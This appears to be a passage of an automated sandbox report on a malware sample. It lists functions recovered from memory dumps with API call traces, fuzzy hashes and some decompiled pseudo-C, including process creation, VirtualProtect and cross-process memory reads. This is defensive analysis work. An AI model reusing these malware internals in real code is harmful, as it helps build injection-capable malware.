                              • GetComputerNameExA.KERNELBASE(00000003,00000000,013E63F4,770CC740,00000000,?,?,013E63F4), ref: 013E40C4
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • GetComputerNameExA.KERNELBASE(00000003,00000000,013E63F4,013E63F5,?,?,013E63F4), ref: 013E40E1
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: ComputerHeapName$AllocateFree
                              • String ID:
                              • API String ID: 187446995-0
                              • Opcode ID: 2ddd2545f6737358fd1f63454693658b35c70d4ce26be3cedcb1beef27b97203
                              • Instruction ID: a7fc86d707a0b62c103d6bd737e06f1184c177c13f49b9437e7394f0a88f1973
                              • Opcode Fuzzy Hash: 2ddd2545f6737358fd1f63454693658b35c70d4ce26be3cedcb1beef27b97203
                              • Instruction Fuzzy Hash: 43F03667A00319AAE711D65D8C04E9F7AEDDBC5654F150075A515E7180DA70DE068760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01043BE1, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(01050460), ref: 01043BEB
                              • RtlLeaveCriticalSection.NTDLL(01050460), ref: 01043C27
                                • Part of subcall function 01034CC6: lstrlen.KERNEL32(0104F4B4,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D13
                                • Part of subcall function 01034CC6: VirtualProtect.KERNELBASE(00000000,00000000,00000040,-00000020,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D25
                                • Part of subcall function 01034CC6: lstrcpy.KERNEL32(00000000,0104F4B4), ref: 01034D34
                                • Part of subcall function 01034CC6: VirtualProtect.KERNELBASE(00000000,00000000,?,-00000020,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D45
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                              • String ID:
                              • API String ID: 1872894792-0
                              • Opcode ID: c923e6fab999a3e14a2095edb066202aa0ac9c1844bbcf301c024cd5c642dd3d
                              • Instruction ID: 9de2ccb72d1912d3ab2a884572c8276f7d55a2b99e6090198b72a2c405568de0
                              • Opcode Fuzzy Hash: c923e6fab999a3e14a2095edb066202aa0ac9c1844bbcf301c024cd5c642dd3d
                              • Instruction Fuzzy Hash: A1F0A7FA7012199B87A06F5999C487BFFACFB49311301019EFDC597304DE635C018B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010434D9, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 010343EF: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 01034428
                                • Part of subcall function 010343EF: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0103445E
                                • Part of subcall function 010343EF: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0103446A
                                • Part of subcall function 010343EF: lstrcmpi.KERNEL32(?,00000000), ref: 010344A7
                                • Part of subcall function 010343EF: StrChrA.SHLWAPI(?,0000002E), ref: 010344B0
                                • Part of subcall function 010343EF: lstrcmpi.KERNEL32(?,00000000), ref: 010344C2
                                • Part of subcall function 010343EF: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 01034513
                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,0104C5B8,0000002C,0103656E,04B38DBA,?,00000000,0102EAB2), ref: 01043518
                                • Part of subcall function 01031635: GetProcAddress.KERNEL32(?,00000000), ref: 0103165E
                                • Part of subcall function 01031635: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,0104684F,00000000,00000000,00000028,00000100), ref: 01031680
                              • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,0104C5B8,0000002C,0103656E,04B38DBA,?,00000000,0102EAB2,?,00000318), ref: 010435A3
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                              • String ID:
                              • API String ID: 4138075514-0
                              • Opcode ID: 60bced59846de817fcc65201e7cb83255ce430018866d7a2aa061c164909f958
                              • Instruction ID: 5769a93ae1363402c619752187781ac560393827c67c7d899e9da494518780c2
                              • Opcode Fuzzy Hash: 60bced59846de817fcc65201e7cb83255ce430018866d7a2aa061c164909f958
                              • Instruction Fuzzy Hash: B42104B5D01229EBCF519FA5D884ACEBBB4BF08720F10812AF954BA150C3345A40CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E8F5E, Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                              Download Yara Rule
                              C-Code - Quality: 32%
                              			E013E8F5E(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x703be700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                              0x013e8f65
                              0x013e8f72
                              0x013e8f74
                              0x013e8f77
                              0x013e8fbc
                              0x013e8fc4
                              0x013e8fca
                              0x013e8fce
                              0x00000000
                              0x00000000
                              0x013e8f7b
                              0x013e8f86
                              0x013e8f89
                              0x013e8fba
                              0x00000000
                              0x00000000
                              0x013e8f8b
                              0x013e8f8e
                              0x013e8f95
                              0x013e8f99
                              0x013e8fa2
                              0x013e8faa
                              0x013e8fd8
                              0x013e8fac
                              0x013e8fac
                              0x00000000
                              0x013e8fac
                              0x013e8faa
                              0x013e8f95
                              0x013e8fdb
                              0x013e8fe2
                              0x013e8fe2
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: e901eaf1fd823d2bbfad1d7e8d49116758d16729c9132d15fd21bbe12f7ea233
                              • Instruction ID: 57baf231941a8d5238916263b8ac69d34ad94c54ecac83f3c0903d71372ac9b0
                              • Opcode Fuzzy Hash: e901eaf1fd823d2bbfad1d7e8d49116758d16729c9132d15fd21bbe12f7ea233
                              • Instruction Fuzzy Hash: 4A011231D00318FBDF219F99D84899EBFFDEB45754F108066EA01D61C1C7708A49CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102B1DA, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(?), ref: 0102B1EF
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 5742511a4760f35281228d0fa6da871448b4fabe9807b8cf4918b9fde907103b
                              • Instruction ID: e2abfa5f2760e4aa6346a04474cce7d898b95b999372ff080500f448a2a4b042
                              • Opcode Fuzzy Hash: 5742511a4760f35281228d0fa6da871448b4fabe9807b8cf4918b9fde907103b
                              • Instruction Fuzzy Hash: 883190B6A00325EFCB61DF8CD48099EBBF4FB46310F1540AAE684EB215D630AD04CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E78A8, Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 92%
                              			E013E78A8(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x13ed270, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                              0x013e78ad
                              0x013e78b2
                              0x013e78c0
                              0x013e78c6
                              0x013e78ca
                              0x013e793b
                              0x013e78cc
                              0x013e78d0
                              0x013e78d3
                              0x013e78d6
                              0x013e78dd
                              0x013e78de
                              0x013e78df
                              0x013e78e3
                              0x013e78e6
                              0x013e78ed
                              0x013e78f3
                              0x013e78f4
                              0x013e78f4
                              0x013e78fb
                              0x013e78fc
                              0x013e78fd
                              0x013e7901
                              0x013e790d
                              0x013e7913
                              0x013e7914
                              0x013e7914
                              0x013e7916
                              0x013e791c
                              0x013e791e
                              0x013e7923
                              0x013e7924
                              0x013e7924
                              0x013e792a
                              0x013e7933
                              0x013e7935
                              0x013e7938
                              0x013e7947

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 013E78C0
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 69b30e87081916e2b5bbaeee5e04be4d601efe378ab6c75b1f5a080a9429b3ce
                              • Instruction ID: e1ae04c8f0ba43a379eb1f42deb60768c8d22643524049411749b1acc59cd3b0
                              • Opcode Fuzzy Hash: 69b30e87081916e2b5bbaeee5e04be4d601efe378ab6c75b1f5a080a9429b3ce
                              • Instruction Fuzzy Hash: F111E471645344AFEB168F2DC456BE97FA9DF23358F14408AE5808F2D2C277850BC760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010435B6, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(?,00000003,0104F514,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 010435F1
                                • Part of subcall function 01044582: NtQueryInformationProcess.NTDLL(00000000,0102B24B,00000018,00000000,01050460), ref: 01044599
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HandleInformationModuleProcessQuery
                              • String ID:
                              • API String ID: 2776635927-0
                              • Opcode ID: 67d1be2ad6bec687626b9963c1fc3144208cba5569420b39d7897d46e1c42a36
                              • Instruction ID: 34588cb7693228199fc671249c150c94c8d6753d719870d85ba6b7719383c83c
                              • Opcode Fuzzy Hash: 67d1be2ad6bec687626b9963c1fc3144208cba5569420b39d7897d46e1c42a36
                              • Instruction Fuzzy Hash: 0121A2B5200216AFEB60DF5DD5C096A7BE8FF4829071494B9EAD9CF350DB31E900CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010213F2, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01021444
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: e3b5680f6405e22f27ceebe9d16393180b54eb4b46887e64efabc7e85a419bc4
                              • Instruction ID: d749e8f5d563588f9fba6055e834915d99f2b97e1d29036830ed4eecf07acdbf
                              • Opcode Fuzzy Hash: e3b5680f6405e22f27ceebe9d16393180b54eb4b46887e64efabc7e85a419bc4
                              • Instruction Fuzzy Hash: 2A115B3260021AAFDF419FA9DC409DE7FA9FF08360B058125FE5C92120CB32C821DFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E3196, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                              Download Yara Rule
                              C-Code - Quality: 34%
                              			E013E3196(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x13ed2b8; // 0x26ea5a8
				_t4 = _t15 + 0x13ee39c; // 0x3ad8944
				_t20 = _t4;
				_t6 = _t15 + 0x13ee124; // 0x650047
				_t17 = E013E5A5E(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E013E6794(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                              0x013e31a0
                              0x013e31a2
                              0x013e31a9
                              0x013e31aa
                              0x013e31ab
                              0x013e31ac
                              0x013e31b2
                              0x013e31b7
                              0x013e31b7
                              0x013e31c1
                              0x013e31d3
                              0x013e31da
                              0x013e3209
                              0x013e31dc
                              0x013e31e1
                              0x013e3206
                              0x013e31e3
                              0x013e31e6
                              0x013e31ed
                              0x013e31f8
                              0x013e31ef
                              0x013e31f2
                              0x013e31f2
                              0x013e31fc
                              0x013e31fc
                              0x013e31e1
                              0x013e3210

                              APIs
                                • Part of subcall function 013E5A5E: SysFreeString.OLEAUT32(?), ref: 013E5B3D
                                • Part of subcall function 013E6794: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,013E3D8B,004F0053,00000000,?), ref: 013E679D
                                • Part of subcall function 013E6794: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,013E3D8B,004F0053,00000000,?), ref: 013E67C7
                                • Part of subcall function 013E6794: memset.NTDLL ref: 013E67DB
                              • SysFreeString.OLEAUT32(00000000), ref: 013E31FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: FreeString$lstrlenmemcpymemset
                              • String ID:
                              • API String ID: 397948122-0
                              • Opcode ID: 5a7f5c14cf80541989e19cea7c5f2ef0134c92565de1390536d708c570ccb16d
                              • Instruction ID: 6af30a2939fe34fe6dac46d253f5f624ebfa151a3a173c29bba993c9a5f2d319
                              • Opcode Fuzzy Hash: 5a7f5c14cf80541989e19cea7c5f2ef0134c92565de1390536d708c570ccb16d
                              • Instruction Fuzzy Hash: 55014C32500229BBDB21AF98CC09DAEBBF8FB04618F004525EA51E71A1E771A959CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102B16F, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01039288: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,010501F4,00000000,0102B176,?,0102145C,?), ref: 010392A7
                                • Part of subcall function 01039288: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,010501F4,00000000,0102B176,?,0102145C,?), ref: 010392B2
                                • Part of subcall function 01039288: _wcsupr.NTDLL ref: 010392BF
                                • Part of subcall function 01039288: lstrlenW.KERNEL32(00000000), ref: 010392C7
                              • ResumeThread.KERNEL32(00000004,?,0102145C,?), ref: 0102B184
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                              • String ID:
                              • API String ID: 3646851950-0
                              • Opcode ID: 32cdf4025621ef73f049443cf6185f995bfa3dc13b1278b59a4d450920012bfc
                              • Instruction ID: a2ee103b1395ee208b91d9b2f3b075b48ae5f011a009de89d21a0cc1dffc0fe3
                              • Opcode Fuzzy Hash: 32cdf4025621ef73f049443cf6185f995bfa3dc13b1278b59a4d450920012bfc
                              • Instruction Fuzzy Hash: 6AD0A734204751E7DB621715CF45B4BBFD6AF90B84F54C81CFDC945066C77284149615
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01048553, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                              Download Yara Rule
                              APIs
                              • ___delayLoadHelper2@8.DELAYIMP ref: 01048560
                                • Part of subcall function 010486A9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002C5B4,01020000), ref: 01048722
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ExceptionHelper2@8LoadRaise___delay
                              • String ID:
                              • API String ID: 123106877-0
                              • Opcode ID: 839859ee11d2c4892b2a83cb1ec9d730111ba91c9e47f00fe25fc7d4f4904879
                              • Instruction ID: d791a01ab1f08a8558d695032ff064d83bee9415b7618da763719a5dccc4e1ea
                              • Opcode Fuzzy Hash: 839859ee11d2c4892b2a83cb1ec9d730111ba91c9e47f00fe25fc7d4f4904879
                              • Instruction Fuzzy Hash: 24A001D62EA2427E364966D66E9AC7F621CC4E5A22330CD3FB592A8048A990198911B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0104856E, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                              Download Yara Rule
                              APIs
                              • ___delayLoadHelper2@8.DELAYIMP ref: 01048560
                                • Part of subcall function 010486A9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002C5B4,01020000), ref: 01048722
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ExceptionHelper2@8LoadRaise___delay
                              • String ID:
                              • API String ID: 123106877-0
                              • Opcode ID: 2282b859dc54adb2ee72023ef21e1b619e154e980f975a32e130775c59e6cde3
                              • Instruction ID: 04d205fc175392ea53b367fd885099d61709d38d62cae9822a1ea43aa78108a8
                              • Opcode Fuzzy Hash: 2282b859dc54adb2ee72023ef21e1b619e154e980f975a32e130775c59e6cde3
                              • Instruction Fuzzy Hash: F0A001D62AA243BE364966D66E96C7F621CC4E9A61330CD3FA492A8048A990188511B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010469F0, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: d43851c99458bdf4af7783714d675d0c63765bad1ecb7f979907f4eb8d03bd64
                              • Instruction ID: ccb32bf483304451fdaba24b511156e130062b015603168552a72332fb74e669
                              • Opcode Fuzzy Hash: d43851c99458bdf4af7783714d675d0c63765bad1ecb7f979907f4eb8d03bd64
                              • Instruction Fuzzy Hash: 41B012B9240300EBCB614B00DF04F0E7A22A750700F004010B3890007C863B0430EB05
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103032D, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 082e565fb288035cc93058932922e72d4d3a9fadc2a8a2c0be9bccd667aa3a63
                              • Instruction ID: 4c3e09776b80d09a1088712a3469ab7930d39022e69c189967cff01744ccdd3d
                              • Opcode Fuzzy Hash: 082e565fb288035cc93058932922e72d4d3a9fadc2a8a2c0be9bccd667aa3a63
                              • Instruction Fuzzy Hash: A1B01279540300FBCB618B00DE04F0E7B62A750700F008010B2860007C83371420EF15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E55DC, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E55DC(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x13ed270, 0, _a4); // executed
				return _t2;
			}




                              0x013e55e8
                              0x013e55ee

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 35d5be9239ced87ef527b3b52193639b1eb283611920feab757136087bcc152e
                              • Instruction ID: b22b0727ea6b98527419b54a80f2477fc4b660a112271d38ab298500af2ad7b6
                              • Opcode Fuzzy Hash: 35d5be9239ced87ef527b3b52193639b1eb283611920feab757136087bcc152e
                              • Instruction Fuzzy Hash: 05B012B1100300ABCE314B90DF04F097FB5B750710F005011F3040C0E8C2319820EB04
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E2363, Relevance: 1.3, APIs: 1, Instructions: 98COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E2363(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E013EA483(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E013E55DC(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E013E6DFA(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E013E6B8E(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t42 = E013E6E7F(_t61, _a4,  &_v8,  &_v12,  &_v144, 0); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                              0x013e236e
                              0x013e2371
                              0x013e237a
                              0x013e237d
                              0x013e2380
                              0x013e2383
                              0x013e247c
                              0x013e2480
                              0x013e2395
                              0x013e23a1
                              0x013e23a8
                              0x013e23af
                              0x00000000
                              0x00000000
                              0x013e23b5
                              0x013e23bd
                              0x00000000
                              0x00000000
                              0x013e23c3
                              0x013e23cc
                              0x013e23d0
                              0x00000000
                              0x00000000
                              0x013e23d2
                              0x013e23d9
                              0x013e23de
                              0x013e23e0
                              0x013e23e3
                              0x013e2461
                              0x013e2468
                              0x013e246a
                              0x00000000
                              0x00000000
                              0x013e246c
                              0x013e2470
                              0x013e2475
                              0x013e2475
                              0x00000000
                              0x013e2470
                              0x013e23ea
                              0x013e23f2
                              0x013e23f2
                              0x013e23fb
                              0x013e2409
                              0x013e245d
                              0x013e245d
                              0x00000000
                              0x013e242c
                              0x013e242f
                              0x00000000
                              0x013e242f
                              0x013e2409
                              0x013e2449
                              0x013e244e
                              0x013e2450
                              0x013e2465
                              0x00000000
                              0x013e2465
                              0x013e2452
                              0x013e2458
                              0x013e245b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e245b

                              APIs
                              • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,00000001,?), ref: 013E23EA
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 33001e3b9a6cb1d0f9a6f5c8c82e8a7ada59412a574fd8dff2d869cb30235c3d
                              • Instruction ID: b6c405d1f79c3b54f124ad9c5ee8d670e1467b16caef2da0ff99a0d40edfd3b8
                              • Opcode Fuzzy Hash: 33001e3b9a6cb1d0f9a6f5c8c82e8a7ada59412a574fd8dff2d869cb30235c3d
                              • Instruction Fuzzy Hash: 72310C71A0032DEFDF21DF98C888BEEB7FCAB15208F1440A9E559B7181D6709E858F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102CAEC, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 010432FF: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043337
                                • Part of subcall function 010432FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0104334B
